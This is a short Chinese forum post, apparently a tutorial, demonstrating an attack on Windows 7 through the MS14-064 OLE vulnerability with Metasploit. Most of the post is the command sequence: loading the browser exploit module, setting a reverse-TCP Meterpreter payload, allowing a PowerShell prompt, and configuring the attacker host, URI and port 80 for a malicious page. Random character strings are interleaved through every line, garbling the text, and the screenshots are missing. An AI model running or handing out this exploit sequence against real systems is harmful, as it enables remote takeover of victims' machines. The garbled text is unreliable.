找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1430|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

( _; b2 g! d" d 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 ; v. c% s3 `0 ^# x

3 m! S1 D+ m. I; t: @8 x# M

. V4 s9 @' ^$ L4 K5 l 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: , a0 H4 r2 c3 O M; t9 C

1 R+ q- `: X- k6 g! W1 G

s6 S" U; q& D+ d" |# b. \ 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp$ W4 T3 _& ^9 q, e" N/ C

1 V+ D* ~- p4 p: m7 u! t1 f

. X7 A- Y+ U( [: Z; M( G             set AllowPowershellPrompt true. W# ~+ s. v; D8 | Y6 I+ p

: @" J6 g( \, s3 \8 b* G

6 |3 Y5 \. }; F3 y+ T# U+ O             Set LHOST 192.168.0.1091 q( n; x* L0 F2 W, i& E

$ K, F2 A" Q% a: O* t. N; a7 q9 `3 f

+ Q8 P+ B4 x0 H$ C             set SRVHOST 192.168.0.109: {! i. D. B. d9 e$ t: g+ t" \

0 e# M8 W1 d+ w2 h; K

7 W3 S8 [$ v& ]; J5 R: P             Set uripath share, L O0 a( f( f; i6 ]

# _% N4 ?, G& E7 o' u; N

2 }, x8 a- h2 F2 ]) y4 s             Set srvport 80, h+ R3 _8 o: X$ ?0 P6 j

& V9 B# N$ _! r# M2 i* T5 T

( C! B* Q! U. b$ F3 R, M   . R0 t+ r9 M+ R5 c9 Q( \

) K o! p; |& ]4 {' [

' X7 Y+ |$ r8 L   " K, ?5 v" l5 v3 `

9 a) c$ g; ^8 h9 ]

& c) [8 y( p: c N' [  9 R: G# [; X& V/ o* y4 n2 ^ f

7 p0 u1 L' e* y/ ?/ C

/ f# y% [- p9 o' E4 p. V7 x   9 e0 t$ u: r. b' ?" s3 G4 X

. @" B& F1 ]1 s9 \& e1 K# L

1 a- o* S* |; z9 |# U$ m+ J, f2 B  ) V3 Q! V9 e& L% I: B" C5 t5 i

; E- k9 x r9 Y( n

' N" p7 i: M- t/ t4 c( H# d N 下面我们来访问本地地址如图:; j& w3 K: p1 E: Z3 T

# g4 d8 T, @* I, P+ g9 \

. V! L$ X$ q( I, L& E) k! S* q" g  2 i e! B( \% G% _" O; E+ A

1 q. r- L2 w$ R. J/ Q2 s

" T' K4 j2 p1 S) h6 P$ E+ l  ' T5 ], a8 g7 u8 _* X

: x2 |8 Q+ \7 H- [. {& G6 ^

, ~ ]0 Y0 _+ V% D1 k / \ o1 Y8 m# Q0 Y; V0 A. K

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表